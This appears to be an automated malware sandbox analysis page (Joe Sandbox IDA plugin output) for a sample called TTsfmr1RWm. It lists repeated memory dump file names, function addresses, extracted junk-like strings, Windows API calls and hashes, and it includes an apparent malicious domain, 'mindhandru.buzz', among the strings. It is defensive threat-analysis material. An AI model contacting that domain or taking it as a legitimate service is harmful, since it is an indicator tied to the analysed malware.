Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: #E#G$%"$+A#C$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$g}zh$mindhandru.buzz$s$wdnf$~SS}$rp
API String ID: 0-3084901486
Opcode ID: ba8267c29c6d63ef2f93fc023f7772c8f7963724c478e72563bba226a6463bb5
Instruction ID: 47489cf264d3f2bec8ef2a51c2b50f890d4fbe42ee3b83b63d68b6de53306656
Opcode Fuzzy Hash: ba8267c29c6d63ef2f93fc023f7772c8f7963724c478e72563bba226a6463bb5
Instruction Fuzzy Hash: 39B223B2A18301CFD714CF29C8917ABBBE2FF85310F19856CE8999B391D7389945CB91

Function 009458D5 Relevance: 29.6, APIs: 1, Strings: 15, Instructions: 1631COMMON

Download Yara Rule

Strings

*,-", xrefs: 009466EF
{zdy, xrefs: 0094611D
pt}w, xrefs: 009461F2
~mfQ, xrefs: 0094613E
3F&D, xrefs: 00946273
qRb`, xrefs: 00946133
L4, xrefs: 00946780
t~v:, xrefs: 009461E7
S\], xrefs: 009459EE
w}MI, xrefs: 00946128
WQ, xrefs: 009459E3
_^]\, xrefs: 00945B14
uqrs, xrefs: 00946AF0
L4, xrefs: 00946BA0
ntxE, xrefs: 00946112

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
API String ID: 0-510280711
Opcode ID: b8d5d74afbe310cec14a7cd120d2783229ce71ed3ec8da944acc63efc864f837
Instruction ID: 6693d01fd9e06dfb39f17aafea0cf4f2ddeabe8528637ec69662c8705d31bcdf
Opcode Fuzzy Hash: b8d5d74afbe310cec14a7cd120d2783229ce71ed3ec8da944acc63efc864f837
Instruction Fuzzy Hash: 68B226B26083418FD7248F24D891BABB7E6FFD6314F19892CE4C987296D7359845CB43

Function 00951D00 Relevance: 26.8, Strings: 21, Instructions: 506
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?, xrefs: 00951F02
], xrefs: 009523BD
], xrefs: 00951DAE
_, xrefs: 00952141
8, xrefs: 00951F07
9, xrefs: 00951F0C
,, xrefs: 009521D9
d, xrefs: 009520D6
^, xrefs: 00951DA9
_, xrefs: 00951DA4
], xrefs: 0095214B
g, xrefs: 009520CC
_, xrefs: 009523B3
\, xrefs: 009523C2
\, xrefs: 00952150
^, xrefs: 00952146
!@, xrefs: 00951D36
Z, xrefs: 009520DB
^, xrefs: 009523B8
s, xrefs: 00952284
\, xrefs: 00951DB3

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
API String ID: 0-1565257739
Opcode ID: 4229f68640a16313cb1f636efe18604a2e1c150ce7f6aeee243c28ad5f2afab0
Instruction ID: 525a540049d534d84593d94551d14e0061d8b49629054c80316300b4f6084e9b
Opcode Fuzzy Hash: 4229f68640a16313cb1f636efe18604a2e1c150ce7f6aeee243c28ad5f2afab0
Instruction Fuzzy Hash: 7522797150C7808FD324DB29C48536FBBE1AB86315F284D6EE8D987392D7798889CB43

Function 00969280 Relevance: 23.4, APIs: 5, Strings: 8, Instructions: 661
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(00001F7A), ref: 00969551
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0096958E
SysFreeString.OLEAUT32 ref: 009698DF
SysFreeString.OLEAUT32(?), ref: 009698E5
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 0096992E

Strings

t"j, xrefs: 0096966E
O^, xrefs: 009697A6
Jtuj, xrefs: 009692E5
=hn, xrefs: 00969676
b{tu, xrefs: 009692D9, 0096939B
:;$%, xrefs: 009699C0
SB, xrefs: 0096979E
gd, xrefs: 0096968E

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: String$Free$AllocBlanketInformationProxyVolume
String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
API String ID: 1773362589-1335595022
Opcode ID: 574d6c34aa3b6da7945a25e6016bd3297d9e3d773f26ad35c896877394010fb9
Instruction ID: 80600a8832b9faf865c2fe612b36e27c000c6aa7bd7f699753ef03cb8d8f3aaa
Opcode Fuzzy Hash: 574d6c34aa3b6da7945a25e6016bd3297d9e3d773f26ad35c896877394010fb9
Instruction Fuzzy Hash: 8A221276A183119BE310CF28C881B5BBBE6EFC5314F18892CF9D49B3A1D675D845CB82

Function 0093B100 Relevance: 20.4, Strings: 16, Instructions: 425
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9]_, xrefs: 0093B28F
.AtC, xrefs: 0093B249
S%U', xrefs: 0093B203
k=W?, xrefs: 0093B23F
b6j4, xrefs: 0093B57D
(Y6[, xrefs: 0093B285
Ym]o, xrefs: 0093B2B7
Gu@w, xrefs: 0093B2CB
}KcU, xrefs: 0093B6DF
D!M#, xrefs: 0093B1F9
yQrS, xrefs: 0093B271
XyR{, xrefs: 0093B2D5
zMzO, xrefs: 0093B267
hI2K, xrefs: 0093B25D
pE}G, xrefs: 0093B253
Gq\s, xrefs: 0093B2C1

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO$}KcU
API String ID: 0-18744084
Opcode ID: 82f3a347f58b332eb722e4e7ab3d04c4abe547c196092fc7e6bd590596db628b
Instruction ID: 3223cb2a34059ce453a4969e8a5988f495f45a1ac639ba8671ff4066ac5b26b6
Opcode Fuzzy Hash: 82f3a347f58b332eb722e4e7ab3d04c4abe547c196092fc7e6bd590596db628b
Instruction Fuzzy Hash: D00265B2214B01CFD324CF25D891B9BBBF1FB49314F118A2CE5AA8BAA1D775A444DF50

Function 00968EA0 Relevance: 15.3, Strings: 12, Instructions: 287
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_, xrefs: 00969054
^, xrefs: 00968F41
], xrefs: 0096905E
\, xrefs: 00968F4B
_, xrefs: 00968F3C
], xrefs: 00969196
\, xrefs: 0096919B
^, xrefs: 00969191
^, xrefs: 00969059
_, xrefs: 0096918C
\, xrefs: 00969063
], xrefs: 00968F46

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
